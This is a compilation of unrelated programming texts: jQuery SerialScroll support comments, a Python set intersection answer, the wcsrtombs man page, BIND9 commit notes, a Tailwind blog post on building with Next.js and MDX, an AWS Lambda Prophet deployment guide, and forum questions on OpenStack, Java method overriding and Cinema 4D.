You can do this using the onBefore and onAfter, but I foresee quite complicated code. Cheers Thanks! I wonder if it would work with your rotater script? VERY clever, never thought about that :) Let me know if you do use it. Thanks Hello! Thanks for the great script. One of my divs has a form in it. When the form is submitted, it gives a success or error message in that same section. How do I make the php form go back to that same section when the form is submitted and the page reloads instead of showing the first section? Thanks a lot. Hi I haven't done this, but try adding an "id" to the section, then in the action of the form, add #id_of_section. That should make the browser focus the section. Hope it works well Thanks for the suggestion. I tried that. When the form is submitted. It goes back to the form section (section 3) for a sec then goes to the first slide right away. What do you think is causing that? Remove the part that says: force:true, It worked! You rule. Thanks I want to scroll item from bottom, and stop when mouse over. Please help me. Ariel, this is working great! I have to admit, I'm a newcomer to javascript and jquery, and I'm trying to do something very simple that I'm having trouble with. I want to be able to activate the scoll event from within the object. So, each item in the panel contains a button to go forward and back, but even using selectors to traverse the innerHTML, it doesn't recognize these links. When I put the links outside of the panel, it starts working. I'm sure this is an easy solution, but I've been working on this for a few hours now.... E-mail me if you'd like a link to what I'm working on. @Anonymous(use a name plz) To scroll from bottom, check the post called "Doctorate on jQuery.SerialScroll" there's one script that is right-to-left/bottom-to-top. As for stopping on mouseover, there's a script too. Just combine both (use axis:'y' for vertical scrolling). 
@jj To externally manipulate the widget, use the custom events described above. I don't know your email, send me one to the address on the right, I'll reply to you asap. Cheers Ariel, I started messing around with SerialScroll after just recently playing with localScroll. Is it possible to have content loaded externally which contains the content I want to serialScroll. I ask because I know I would probably have to use liveQuery or is there a "lazy" attribute that can be used for SerialScroll? Jeff Hi Jeff SerialScroll has the option 'lazy' as well ( read the docs! :) ). Only the items can de dynamic, that is, you must keep the scrollable pane, 'prev', 'next' and 'navigation' if used. Note that if you need lazy navigation, you can safely combine it with LocalScroll. Hi, This is a probably a really simple question, but how do I add a link URL to the image currently shown ? The ones either side go left or right, but I want the central one to launch a URL. Thank Darren I imagine you're using the option 'jump'. What you want is something quite specific. You should code that with your own click binding, or using the onBefore function. Cheers Thanks Ariel, I have managed to get everything working now but one thing still niggles... I have set the scroll to start on a different item than the first one in the list but can't seem to work out how to make it highlighted with the 'selected' class. Should I be using the onBefore function again? (Please see:) Thanks again for all your support! Instead of using start+force, trigger a goto event by yourself. Hi Ariel, great tool! While testing this tool I noticed the 'start' feature does not work well on Safari -- who uses Safari? I dont know, but just thought I'd let you know. Also, on a post on May 31st some dude was asking how enable links on a particular slide... im not very familiar with OnBefore or JQuery, can you give me push in the right direction? Thanks again for this amazing tool. 
Omid S Hi Omid The option start surely works. It just tells the plugin to start on a different position than 0. I do test everything on Safari. As for the second part, I don't quite get what you mean. The onBefore is a setting of the plugin. A function called before each slide. Sadly the online demo is out of service, but if you read the docs, you should be able to see how it works. Ping me by email if you need more help. Cheers Ariel, great plugin! One thing though, is that it would be nice if there were a destroy() method that unbinds all the events and resets all the properties that Serial Scroll adds to the container and child elements. That way you could "re-initialize" SerialScroll on the same container more than once. Hi Sean SerialScroll doesn't add any property to any element. The only change is event binding. I didn't add this method, as it's not usually needed and it's very easy to do that manually. You need to unbind w/e you chose as 'event' (click by default) from the arrows. Then unbind it from the container (if 'lazy') or the items. Finally, unbind('.serialScroll') from the container. Note that you prolly don't need to rebind, for dynamic content do consider the option 'lazy'. Thanks for the Great Plugin! I'm having an issues with SerialScroll not working in IE...Safari and FF 3.0 work great. here is the link to the page: the plus/minus arrows are the next/prev. Any help is much appreciated. Thanks! Hi Add position:relative to #article_container. Cheers Perfect!, thanks! Hi, I have container where i animate the products and a pager which are gray dots and onclick on any gray dot, after animating the product, i need to take the id of JUST CLICKED gray dot and assign css class as 'ACTIVE' (yellow dot) and the rest of gray dots should go 'inactive' (gray dot) I see the alert many times but it should show the alert just once. 
here is the code: If you see an alert saying 'i am a good link' that appears many times... it might be a stupid question, I'm sorry, I am not that good at jQuery. The other point is that if I take this block of code outside onAfter, it's not working. Please help Try this: @Ariel Flesler Thanks for your reply and the effort of writing me some code, but it's still not working. I put an alert on elem.id and I got nothing (empty) in the alert. Can you please explain what elem is and how I can access its contents? Will it be the link clicked to animate the pane, or the pane being animated? Thanks for your reply and efforts. It looks great except for this problem. Hi Aamir My bad, try this instead: It uses the onBefore instead of onAfter, so it'll happen when the animation starts. But it receives more arguments and makes this easier. Cheers Hey! Great work. Your advice to add position:relative to the container is VERY important. I spent a frustrating night trying to figure out why IE7 wasn't scrolling my div elements that contained links. (Worked with images though, weird). Anyway, thanks for the great work! Is it possible to use the onAfter function to show a particular DIV layer when you have scrolled to an image? For instance, I have 5 images I'm scrolling through. When I stop at image 3 I would like DIV 3 to appear beside it. So DIV 1 becomes hidden and DIV 3 becomes visible. Is that possible please? Hi Yes, the first argument of the onAfter is the element you scrolled to. Using it, you can find its corresponding div and show it. You keep the previous div in an external variable and hide it, then save the new div into the var. Great plugin. But since I'm a noob at jQuery and JavaScript, I can't get past one problem. I'm putting href links in some text blocks in the li tags, but when I click that link, nothing happens. I suspect it's because the script is set up to advance the scroll on the click event, but I don't know any way around it. Mind suggesting how to change this?
If I'm not getting your problem incorrectly, you have 2 options. 1- If you're using the option 'jump' as true, then set that to false. 2- Add this code: Cheers Hello again, I want it very similar to this one but without the gap at the bottom when it ends. How do you control the speed too? thanks! Ariel, We are willing to pay if you can help us fix the problems on Basically we need it to pause on rollover and also have a continous cycle, with no gap between the bottom of the last item and when it starts over. Just let us know if you can help us and how much you want to charge. The client is getting antsy so we need to get it done soon. THe current live homepage at has another script which works fine but the client does not like the gap at the bottom of the content. So that's why we are trying to use your awesome script. Thanks alot! Kevin Hi Kevin Contact me by IM or email. I have Gtalk and MSN. aflesler[a]gmail flesler[a]hotmail Hello Ariel, today I tried your really great plugin. But is it possible that the 'cycle' does not really work? I tried your demo and as far as I understood it shall endless scroll in ONE direction but the scroll is "bouncing"? Did I understood something wrong or where is my mistake ('caus such a endless scroller in one direction is exacly what I need and I'm looking for...) Thanks for your help and best regards, Lars Hi Lars Indeed, the option 'cycle' does bounce. Having an endless animation would require to move/clone elements, that is something the plugin won't do. You can do that yourself using the onBefore. You need to set the option 'lazy' to true, and clone/append elements as it scrolls. It will continue the animation naturally. Hi Ariel, thanks for the answer. Could you imagine to provide such a feature in one of the next releases? It would be really great :) greetings, Lars Hi I can provide a way of doing that with a separate script, like I did for other kind of situations. But not into the plugin itself. 
I keep it generic and there isn't one single way of doing this, and it wouldn't satisfy any situation. Hi, that would be very kind and great. Looking forward :) Thanks a lot, Lars Hi Ariel, I'm using your plugin to scroll logos horizontally across a banner, I've got it all working as I want, and now I'm trying to make the animation stop whenever I mouseover a logo and then restart when I mouseout. I've created a function on mouseover of the logos that calls $(container).stop() but it doesn't seem to be working properly. The animation bounces a around back and forth a little instead of stopping completely, and then on mouseout it resumes it's steady scroll. Do you know what might be causing this behavior? Also, I'd be interested in what Lars mentioned about a solution to scroll endlessly in one direction rather then bouncing from one side to the next when using cycle. Oh BTW, thanks for such a great plugin! I searched around a lot for the best solution for my needs before finally coming to your plugin. HI Benek Check the blog post called "Doctorate on SerialScroll", it has the snippet to do that. As for the endless scrolling, it's doable, I just haven't made a model call yet :) Thank you so much for the quick reply. I got you snippet and it works like a dream. Excellent plugin! Your Plugin works great. but i want to do something like this. when user clicks on the next button and the slide is last. then instead of moving around from last slide to first slide. it will show directly first slide. can you tell me how to do this ? thank you very much for nice plugin. Hi Hardik To make it scroll instantly you'll need to use jQuery.ScrollTo. here you have a draft of a possible solution (you need to fill some parts). If you just want it to scroll 'faster' in that case, you can try setting the option 'constant' to false. I got a DIV with text in it, it's height is 300px. i want to make a custom scrollbar with a smooth flow. 
i thought i could use your plugin, but i still didnt manage how... could you help me out please? Hi, this plugin is to scroll "item-wise", that is thru items. To just scroll a container, you can use just $.scrollTo (serialScroll's base plugin). You simply tell it to scroll to some place whenever you need. how do you control whether or not when you click on the link, the page moves to the top of that ID after scrolling? That is prevented (e.preventDefault()) as that is the expected behavior on most cases. You can bind your own handler to enforce this behavior if you want. $('a.some_links').click(function(){ location = this.href; }); Ariel, Is it possible with this script to scroll to an area in a map? Hi Robert You should, if you're having problems, get me a demo of the prob online and I'll check. Hi Ariel Love the plugin - it does exactly what I want. I am using it to show a horizontal series of product thumbnails that I want to continuously cycle. Everything works great, except that when it reaches the end there is a significant pause before the scrolling "bounces" back. Is this configurable, or is it a pause while it calculates? The settings I'm using are: items:'div', duration:2000, force:true, axis:'x', easing:'linear', interval:1, cycle:true I can show you my work in progress if you want, but I don't want to display it on a public message at this point. Thanks Rob Hi Rob Send me a link by email and I'll check that. Hello! How to highlight navigation link when section active? Please help! Hi, you can do that with an external (click) binding, or inside the onBefore. If you use the event, then one of the parameters is the selected index. That's all you need (check LocalScroll's demo which does this). This is a really nice plugin. Would it be possible to change the speed on a click? What I am trying to do is stop auto-scrolling when a next/prev button is clicked, and I would like the scrolling to then happen faster. 
Should I just set up serialScroll again, differently? Or is there a way to just reset some properties? Hi Frances You can't access the settings object after you call the plugin (I plan to add this). You can certainly call the plugin twice: once specifying prev/next, and the other time the 'interval'. Hi Ariel, I'm trying to set up your script, which I think is amazing, but at present I'm really frustrated because I can't get it working. If I reproduce your serialScroll demo, it works smoothly, but if I try with SerialScroll_right-to-left (which is the one I need), nothing happens in my browser. Following your example I'm using in my head section: Is that order accurate? Did I forget something? Thanks in advance. Those snippets are of course 'models'. You need to shape them to your html and fill in some blanks too. This is a great plugin, good job. Quick question: Is it possible to control the next/previous actions from arrow key presses instead of href="#"? You're confusing plugins. LocalScroll works with hrefs. SerialScroll doesn't. You can manipulate it with the keyboard; check the post called "Doctorate on SerialScroll". Being able to access the settings after you have specified them would be really fantastic. Apart from that, it has made setting up a ticker/scroller fantastically easy. Thanks. Ok thanks. I do have that in mind for a next release.. Hi, first I want to say thank you very much for the great work on all your plugins! Now I have a problem with the Safari, Chrome and Opera browsers. When I use an anchor for prev/next like: prev: 'a.left', next: 'a.right', it doesn't work. If I use it with an img element it works: prev: 'img.left', next: 'img.right', you can see the problem on beta.brandworkers.com BR, Jan
http://flesler.blogspot.com/2008/02/jqueryserialscroll.html?showComment=1222081140000
Python: set union and set intersection operate differently?

I'm doing some set operations in Python, and I noticed something odd:

>>> set([1,2,3]) | set([2,3,4])
set([1, 2, 3, 4])
>>> set().union(*[[1,2,3], [2,3,4]])
set([1, 2, 3, 4])

That's good, expected behaviour - but with intersection:

>>> set([1,2,3]) & set([2,3,4])
set([2, 3])
>>> set().intersection(*[[1,2,3], [2,3,4]])
set([])

Am I losing my mind here? Why isn't set.intersection() operating as I'd expect it to? How can I do the intersection of many sets as I did with union (assuming [[1,2,3], [2,3,4]] had a whole bunch more lists)? What would the "pythonic" way be?

When you do set() you are creating an empty set. When you do set().intersection(...) you are intersecting this empty set with other stuff. The intersection of an empty set with any other collection of sets is empty. If you actually have a list of sets, you can get their intersection in a similar way to how you did the union:

>>> x = [{1, 2, 3}, {2, 3, 4}, {3, 4, 5}]
>>> set.intersection(*x)
set([3])

You can't do this directly with the way you're doing it, though, because you don't actually have any sets at all in your example with intersection(*...). You just have a list of lists. You should first convert the elements in your list to sets. So if you have x = [[1,2,3], [2,3,4]] you should do:

x = [set(a) for a in x]
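To make the accepted answer concrete, here is a short sketch that starts from plain lists (as in the question), converts each to a set, and unpacks them into the unbound set.intersection. The variable names are illustrative, not from the original post.

```python
# Intersection of many collections, starting from plain lists.
lists = [[1, 2, 3], [2, 3, 4], [3, 4, 5]]

# Convert each list to a set, then unpack into set.intersection.
# Calling it on the set class (rather than on set()) avoids the
# empty-set trap: set().intersection(...) always yields set().
common = set.intersection(*map(set, lists))
print(common)  # {3}

# Union works the same way; set().union(...) only happens to work
# because the empty set is the identity element for union.
total = set.union(*map(set, lists))
print(total)  # {1, 2, 3, 4, 5}
```

Note that set.intersection and set.union accept arbitrary iterables as arguments, so only the first argument strictly needs to be a set; converting everything with map(set, ...) keeps the call uniform.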
https://www.edureka.co/community/4828/python-set-union-and-set-intersection-operate-differently?show=4830
wcsrtombs man page (Language: en; Version: 1999-07-25; Fedora, 01/12/10; Section: 3, library functions)

NAME
wcsrtombs - convert a wide-character string to a multibyte string

SYNOPSIS
#include <wchar.h>
size_t wcsrtombs(char *dest, const wchar_t **src, size_t len, mbstate_t *ps);

DESCRIPTION
If dest is not a NULL pointer, the wcsrtombs() function converts the wide-character string *src to a multibyte string starting at dest, writing at most len bytes. The conversion stops if the length limit forces it, if a wide character is encountered that cannot be represented in the current locale, or if the wide-character string has been completely converted, including the terminating null wide character L'\0' (which has the side effect of bringing back *ps to the initial state). In this last case *src is set to NULL, and the number of bytes written to dest, excluding the terminating '\0' byte, is returned. If dest is NULL, len is ignored, and the conversion proceeds as above, except that the converted bytes are not written out to memory, and that no length limit exists. In both of the above cases, if ps is a NULL pointer, a static anonymous state only known to the wcsrtombs function is used instead. The programmer must ensure that there is room for at least len bytes at dest.

RETURN VALUE
The wcsrtombs() function returns the number of bytes that make up the converted part of the multibyte sequence, not including the terminating null byte. If a wide character was encountered which could not be converted, (size_t) -1 is returned, and errno is set to EILSEQ.

CONFORMING TO
C99.

NOTES
The behavior of wcsrtombs() depends on the LC_CTYPE category of the current locale. Passing NULL as ps is not multithread safe.

SEE ALSO
iconv(3), wcsnrtombs(3), wcstombs(3)
https://www.linuxcertif.com/man/3/wcsrtombs/en/
Building the Tailwind Blog with Next.js
Adam Wathan (@adamwathan)

One of the things we believe as a team is that everything we make should be sealed with a blog post. Forcing ourselves to write up a short announcement post for every project we work on acts as a built-in quality check, making sure that we never call a project "done" until we feel comfortable telling the world it's out there. The problem was that up until today, we didn't actually have anywhere to publish those posts!

Choosing a platform

We're a team of developers so naturally there was no way we could convince ourselves to use something off-the-shelf, and opted to build something simple and custom with Next.js. There are a lot of things to like about Next.js, but the primary reason we decided to use it is that it has great support for MDX, which is the format we wanted to use to author our posts.

# My first MDX post

MDX is a really cool authoring format because it lets you embed
React components right in your markdown:

<MyComponent myProp={5} />

How cool is that?

MDX is really interesting because unlike regular Markdown, you can embed live React components directly in your content. This is exciting because it unlocks a lot of opportunities in how you communicate ideas in your writing. Instead of relying only on images, videos, or code blocks, you can build interactive demos and stick them directly between two paragraphs of content, without throwing away the ergonomics of authoring in Markdown.

We're planning to do a redesign and rebuild of the Tailwind CSS documentation site later this year and being able to embed interactive components makes a huge difference in our ability to teach how the framework works, so using our little blog site as a test project made a lot of sense.

Organizing our content

We started by writing posts as simple MDX documents that lived directly in the pages directory.
Eventually, though, we realized that just about every post would also have associated assets, for example an Open Graph image at the bare minimum. Having to store those in another folder felt a bit sloppy, so we decided instead to give every post its own folder in the pages directory, and put the post content in an index.mdx file.

    public/
    src/
    ├── components/
    ├── css/
    ├── img/
    └── pages/
        ├── building-the-tailwindcss-blog/
        │   ├── index.mdx
        │   └── card.jpeg
        ├── introducing-linting-for-tailwindcss-intellisense/
        │   ├── index.mdx
        │   ├── css.png
        │   ├── html.png
        │   └── card.jpeg
        ├── _app.js
        ├── _document.js
        └── index.js
    next.config.js
    package.json
    postcss.config.js
    README.md
    tailwind.config.js

This let us co-locate any assets for that post in the same folder, and leverage webpack's file-loader to import those assets directly into the post.

Metadata

We store metadata about each post in a meta object that we export at the top of each MDX file:

    import { bradlc } from '@/authors'
    import openGraphImage from './card.jpeg'

    export const meta = {
      title: 'Introducing linting for Tailwind CSS IntelliSense',
      description: `Today we’re releasing a new version of the Tailwind CSS IntelliSense extension for Visual Studio Code that adds Tailwind-specific linting to both your CSS and your markup.`,
      date: '2020-06-23T18:52:03Z',
      authors: [bradlc],
      image: openGraphImage,
      discussion: '',
    }

    // Post content goes here

This is where we define the post title (used for the actual h1 on the post page and the page title), the description (for Open Graph previews), the publish date, the authors, the Open Graph image, and a link to the GitHub Discussions thread for the post. We store all of our authors data in a separate file that just contains each team member's name, Twitter handle, and avatar.
import adamwathanAvatar from './img/adamwathan.jpg' import bradlcAvatar from './img/bradlc.jpg' import steveschogerAvatar from './img/steveschoger.jpg' export const adamwathan = { name: 'Adam Wathan', twitter: '@adamwathan', avatar: adamwathanAvatar, } export const bradlc = { name: 'Brad Cornes', twitter: '@bradlc', avatar: bradlcAvatar, } export const steveschoger = { name: 'Steve Schoger', twitter: '@steveschoger', avatar: steveschogerAvatar, } The nice thing about actually importing the author object into a post instead of connecting it through some sort of identifier is that we can easily add an author inline if we wanted to: export const meta = { title: 'An example of a guest post by someone not on the team', authors: [ { name: 'Simon Vrachliotis', twitter: '@simonswiss', avatar: '', }, ], // ... } This makes it easy for us to keep author information in sync by giving it a central source of truth, but doesn't give up any flexibility. Displaying post previews We wanted to display previews for each post on the homepage, and this turned out to be a surprisingly challenging problem. Essentially what we wanted to be able to do was use the getStaticProps feature of Next.js to get a list of all the posts at build-time, extract the information we need, and pass that in to the actual page component to render. The challenge is that we wanted to do this without actually importing every single page, because that would mean that our bundle for the homepage would contain every single blog post for the entire site, leading to a much bigger bundle than necessary. Maybe not a big deal right now when we only have a couple of posts, but once you're up to dozens or hundreds of posts that's a lot of wasted bytes. We tried a few different approaches but the one we settled on was using webpack's resourceQuery feature combined with a couple of custom loaders to make it possible to load each blog post in two formats: - The entire post, used for post pages. 
- The post preview, where we load the minimum data needed for the homepage. The way we set it up, any time we add a ?preview query to the end of an import for an individual post, we get back a much smaller version of that post that just includes the metadata and the preview excerpt, rather than the entire post content. Here's a snippet of what that custom loader looks like: { resourceQuery: /preview/, use: [ ...mdx, createLoader(function (src) { if (src.includes('<!--more-->')) { const [preview] = src.split('<!--more-->') return this.callback(null, preview) } const [preview] = src.split('<!--/excerpt-->') return this.callback(null, preview.replace('<!--excerpt-->', '')) }), ], }, It lets us define the excerpt for each post either by sticking <!--more--> after the intro paragraph, or by wrapping the excerpt in a pair of <!--excerpt--> and <!--/excerpt--> tags, allowing us to write an excerpt that's completely independent from the post content. export const meta = { // ... } This is the beginning of the post, and what we'd like to show on the homepage. <!--more--> Anything after that is not included in the bundle unless you are actually viewing that post. Solving this problem in an elegant way was pretty challenging, but ultimately it was cool to come up with a solution that let us keep everything in one file instead of using a separate file for the preview and the actual post content. Generating next/previous post links The last challenge we had when building this simple site was being able to include links to the next and previous post whenever you're viewing an individual post. At its core, what we needed to do was load up all of the posts (ideally at build-time), find the current post in that list, then grab the post that came before and the post that came after so we could pass those through to the page component as props. 
This ended up being harder than we expected, because it turns out that MDX doesn't currently support getStaticProps the way you'd normally use it. You can't actually export it directly from your MDX files, instead you have to store your code in a separate file and re-export it from there. We didn't want to load this extra code when just importing our post previews on the homepage, and we also didn't want to have to repeat this code in every single post, so we decided to prepend this export to the beginning of each post using another custom loader: { use: [ ...mdx, createLoader(function (src) { const content = [ 'import Post from "@/components/Post"', 'export { getStaticProps } from "@/getStaticProps"', src, 'export default (props) => <Post meta={meta} {...props} />', ].join('\n') if (content.includes('<!--more-->')) { return this.callback(null, content.split('<!--more-->').join('\n')) } return this.callback(null, content.replace(/<!--excerpt-->.*<!--\/excerpt-->/s, '')) }), ], } We also needed to use this custom loader to actually pass those static props to our Post component, so we appended that extra export you see above as well. This wasn't the only issue though. It turns out getStaticProps doesn't give you any information about the current page being rendered, so we had no way of knowing what post we were looking at when trying to determine the next and previous posts. I suspect this is solvable, but due to time constraints we opted to do more of that work on the client and less at build time, so we could actually see what the current route was when trying to figure out which links we needed. 
We load up all of the posts in getStaticProps, and map them to very lightweight objects that just contain the URL for the post, and the post title: import getAllPostPreviews from '@/getAllPostPreviews' export async function getStaticProps() { return { props: { posts: getAllPostPreviews().map((post) => ({ title: post.module.meta.title, link: post.link.substr(1), })), }, } } Then in our actual Post layout component, we use the current route to determine the next and previous posts: export default function Post({ meta, children, posts }) { const router = useRouter() const postIndex = posts.findIndex((post) => post.link === router.pathname) const previous = posts[postIndex + 1] const next = posts[postIndex - 1] // ... } This works well enough for now, but again long-term I'd like to figure out a simpler solution that lets us load only the next and previous posts in getStaticProps instead of the entire thing. There's an interesting library by Hashicorp designed to make it possible to treat MDX files like a data source called Next MDX Remote that we will probably explore in the future. It should let us switch to dynamic slug-based routing which would give us access to the current pathname in getStaticProps and give us a lot more power. Wrapping up Overall, building this little site with Next.js was a fun learning experience. I'm always surprised at how complicated seemingly simple things end up being with a lot of these tools, but I'm very bullish on the future of Next.js and looking forward to building the next iteration of tailwindcss.com with it in the months to come. If you're interested in checking out the codebase for this blog or even submitting a pull request to simplify any of the things I mentioned above, check out the repository on GitHub. Want to talk about this post? Discuss this on GitHub →
https://blog.tailwindcss.com/building-the-tailwind-blog
Finding a User on a Non-Default Domain

I have two domains on my OpenStack setup: 'default' and 'domain1'. Using the Python API, I need to find a user (using the name attribute) on a non-default domain. I tried to do it using the keystone client both as the default admin and as domain1's admin.

As the default admin: if I use the UI, I need to set the domain context to be able to view the users of another domain. Is there any way I could do this using the Python API? As it stands, the search is restricted to users of the default domain.

As the domain1 admin: if I call the projects.find function as the domain1 admin, it returns a Not Authorized error, as it tries to run the list_users function without setting the domain to domain1. Is there any way to do that?

This is my code:

    from keystoneauth1.identity import v3
    from keystoneauth1 import session
    from keystoneclient.v3 import client

    creds = get_keystone_creds()  # gets the credentials from the environment
    auth = v3.Password(**creds)
    sess = session.Session(auth=auth)
    ks = client.Client(session=sess)
    user = ks.users.find(name='testuser')
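One approach that is often suggested for this (hedging: the helper name below is mine, and I have not verified it against a live keystone, so treat the `domain` keyword argument as an assumption to check against the keystoneclient v3 documentation) is to resolve the domain first and pass it into the user lookup, so the search is scoped to that domain rather than the default one:

```python
# Hypothetical helper, not from the original question: look a user up inside a
# specific domain by resolving the domain object first and passing its id to
# users.find(). The `domain` keyword is an assumption based on the
# keystoneclient v3 managers and should be verified against their docs.
def find_user_in_domain(ks, user_name, domain_name):
    domain = ks.domains.find(name=domain_name)          # e.g. 'domain1'
    return ks.users.find(name=user_name, domain=domain.id)
```

Called as `find_user_in_domain(ks, 'testuser', 'domain1')`, this avoids the unscoped list_users call described above.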
https://ask.openstack.org/en/question/95620/finding-a-user-on-a-non-default-domain/
Oh dear, me again... :$

Hello everyone... I have a superclass Human and a subclass Warrior. Problem is, Human has this method:

    public void Reveal() {
        System.out.println("I am " + name + ". ");
        System.out.println("My Strength is " + strength + " my Health is " + health);
        System.out.println("My Intelligence is " + intelligence + " and my Agility is " + agility);
    }

My Warrior inherits this method, but I made changes to it. So I placed this code in my Warrior class:

    public void Reveal() {
        System.out.println("I am " + name + " the Destroyer ");
        System.out.println("My Strength is " + (strength + 20) + " my Health is " + (health + 50));
        System.out.println("My Intelligence is " + (intelligence - 30) + " and my Agility is " + (agility - 20));
    }

The thing is, I input all these attributes, and now the Warrior should show me an output where Strength is 20 higher than the number input. Ex.: input 50, output 70. But it doesn't... it gives me only the output from the superclass method. It shouldn't be like that. The class with the main looks like this:

    public class TestHuman {
        public static void main(String[] arguements) {
            Human Hobject = new Human();
            Hobject.MyChar();
            Hobject.Reveal();
        }
    }

Thank you for looking over it.
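Nothing in the thread states the cause, but a likely one, hedged as my own reading: main constructs a Human with `new Human()`, and an overriding method only takes effect when the object is actually a Warrior. A stripped-down sketch (fields simplified from the thread's classes):

```java
// Minimal sketch: an override is chosen at runtime from the object's actual
// class, so it only runs when the instance is constructed as the subclass.
class Human {
    protected int strength = 50;

    public String reveal() {
        return "My Strength is " + strength;
    }
}

class Warrior extends Human {
    @Override
    public String reveal() {
        // Same +20 adjustment as in the thread's Warrior.Reveal()
        return "My Strength is " + (strength + 20);
    }
}
```

With `Human h = new Warrior(); h.reveal();` dynamic dispatch picks the Warrior version, even though the variable is declared as Human. With `new Human()`, as in the original TestHuman, only the superclass version can ever run.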
https://www.daniweb.com/programming/software-development/threads/267638/subclass-method-doesn-t-overwrite-superclass-method
- 22 May, 2000 — 1 commit
  Add missing REQUIRE tests to existing implementations.

- 19 May, 2000 — 1 commit

- 05 May, 2000 — 1 commit
  Define dns_rdata_loc_t structure. x25 length is only 8 bits.

- 28 Apr, 2000 — 1 commit

- 21 Mar:
  ----------------------------------------------------------------------

- 01 Feb, 1999 — 1 commit

- 22 Jan, 1999 — 3 commits
  Update Copyright dates.

  converted frometext* to use gettoken()

  converted:
      result = foo();
      if (result != DNS_R_SUCCESS)
          return (result);
  to:
      RETERR(foo());

- 20 Jan, 1999 — 1 commit
  txt_fromwire() was not coping with a zero length active buffer.

- 19 Jan, 1999 — 4 commits
  totext/fromtext should all work
  towire/fromwire mostly work
  tostruct/fromstruct return DNS_R_NOTIMPLEMENTED
  compare untested
https://gitlab.isc.org/isc-projects/bind9/-/commits/373ce67419680a398ba3dc51a14a486caaf0afb0/lib/dns/rdata/generic/gpos_27.c
When an Alembic camera is merged into a scene, its Attributes panel has a Camera tab with all the usual camera properties. When I drag & drop the "Focal Length" property into the Python console, I'm told that its value can be obtained with:

    myCam[1028637,5103,500]

After a bit of digging around I was able to eliminate a couple of the magic numbers, like so:

    myCam[1028637,c4d.OBJECT_CAMERA,c4d.CAMERA_FOCUS]

But how was the number 1028637 obtained? It isn't a plugin ID, and there is no constant in the c4d namespace with this value. I don't like hard-coded numbers in my code, so I'd rather have a procedural way of obtaining this value. On a related note, how does C4D know that this is a camera? Its type is reported as BaseObject, not CameraObject. I'd like some way of determining, in code, whether or not an object is an Alembic camera. Thanks!

Hello,

Some symbols are not exposed to the public. There's no particular reason for that, and there's no single place listing all exposed symbols (and we agree it could be nice).

To know if a BaseObject is a camera (or something else) you can use IsInstanceOf. You can also send a message using the ID MSG_GETREALCAMERADATA; with an alembic generator you can use this code:

    camera = doc.GetActiveObject()
    if camera is None:
        return

    if camera.IsInstanceOf(c4d.Oalembicgenerator) == False:
        return

    # This example tries to get the internal camera from a generator.
    # Typically used with the Alembic Generator camera.
    data = {}
    data["res"] = None
    res = camera.Message(c4d.MSG_GETREALCAMERADATA, data)
    if res:
        camera = data["res"]
        print("Camera: " + camera.GetName())

For your next threads, please help us keep things organised and clean. I know it's not your priority, but it really simplifies our work here.
I've marked this thread as a question, so when you consider it solved, please change the state.

Cheers,
Manuel
https://plugincafe.maxon.net/topic/12245/alembic-camera-properties/1
How to Deploy Prophet by Facebook on AWS Lambda

A quick look at Prophet and how it can help you

As Prophet is implemented as an R and Python procedure, the focus for AWS Lambda is on the Python 3.7 runtime.

Hello World

Depending on how you came to this story you might be asking, "What is Prophet?" Let's quote its creators:

After testing the model locally, I got great results that made me decide to bring it to a production level. I tried to avoid the ground-level work of setting up an AWS EC2 instance, so I decided to go with AWS Lambda. In hindsight, that sounded slightly easier than it was. Here's how it's done.

What's the Catch?

The main challenge, explained in one line, is: import fbprophet. AWS Lambda out of the box obviously doesn't come with that package preinstalled, therefore we must install it ourselves. I found the official documentation helpful, but not sufficient to get it done. The reasons are:

- The package must be installed on a replica of the live AWS Lambda environment. Here I got stuck at first, as I was "just" following the official documentation on my macOS. However, the deployment failed due to differences from the Amazon Linux environment. While one option certainly is to set up an EC2 instance online, I found an easier solution with docker-lambda. It's a docker image that replicates the AWS Lambda environment.
- Prophet needs PyStan. Since version 2.19, Stan requires a compiler which supports C++14. Long story short, we need gcc 4.9.3 or higher. As of now, Amazon Linux 1 based Lambdas use gcc 4.8.5. Another time I got stuck. I figured the easiest solution was to pip install pystan==2.18 instead. Another possible solution is mentioned here.
- As of now, deployment packages on AWS Lambda can be max. 250 MB (unzipped, including layers). So we can't just upload the package: we have to delete certain folders to bring the packages down to that size.

Credit to Alexandr, who did most of the heavy lifting in his story here.
Let’s Get it Done Since you’ve read this far, you might be experiencing similar problems. I tried to create a plug and play solution so you can get back to the fun part quicker than I could. - Clone or download my repository. In it, you will find a Dockerfile that will resolve all the problems I mentioned above. - Open the folder of the repository that you just downloaded. In here you can also find the file lambda_function.py. No need to edit it right now, but be aware of it. That’s the file where you can change your lambda_handler. - Now, open your terminal and cdinto the repository. Run the following command: docker build -t fbprophet . && \ docker run --rm -v $PWD:/export \ fbprophet cp upload-to-s3.zip /export This can take a few minutes. Once done, a new file upload-to-s3.zip should appear in the repository folder. That’s it. With that .zip-file you will be able to import fbprophet on AWS Lambda. As the file is larger than 50MB, you must upload via an S3 bucket. In my first tests, I chose 1024 MB Memory and 10 seconds Timeout for my Lambda function. Here’s an example set up: aws lambda create-function --function-name fbprophet \ --runtime python3.7 --handler lambda_function.lambda_handler \ --timeout 10 --memory-size 1024 \ --role arn:aws:iam::[INSERT]:role/[INSERT] If that part is not familiar to you I found these tutorials helpful: Tutorial: Using AWS Lambda with Amazon S3 Suppose you want to create a thumbnail for each image file that is uploaded to a bucket. You can create a Lambda… docs.aws.amazon.com There is also sample code for Python for that specific tutorial. Just testing? Run this command and get a ready to upload upload-to-s3.zip file for AWS Lambda: docker run --rm \ -v $PWD:/export \ marcmetz/prophet:1.0 \ cp upload-to-s3.zip /export Obviously, it’s only an example lambda_function.py in it. But you can already create a “Hello World” test event to see if the import is working. (See screenshot on top and section Invoke the Lambda Function.)
https://marc-metz.medium.com/docker-run-rm-it-v-pwd-var-task-lambci-lambda-build-python3-7-bash-c7d53f3b7eb2?source=post_internal_links---------0----------------------------
I wonder if there's a chance to hide objects the same way it's done in the GetAndCheckHierarchyClone() method. Generally GACHC hides children geometry without destroying their cache, and it doesn't reset DIRTYFLAGS_CACHE. I'd like to do a similar thing to the dependencies, which aren't children. Currently the only method I know is Touch(), but it resets caches and forces all generators to be recalculated when touching the chain. I've seen many similar topics related to the Touch() method, but there were no solutions.

Also, are there any flags to know if an object was made hidden by GetAndCheckHierarchyClone? At least I could try to skip Touching for these objects. GetCache() is returning some value; testing BIT_CONTROLOBJECT is not relevant, as it is set for both generator and input objects.

Hello @baca,

Thank you for reaching out to us. I am struggling a bit with understanding what you want to achieve here. So, you have a setup like this:

    P
    +--A
    |  +--A1
    +--B
       +--B1

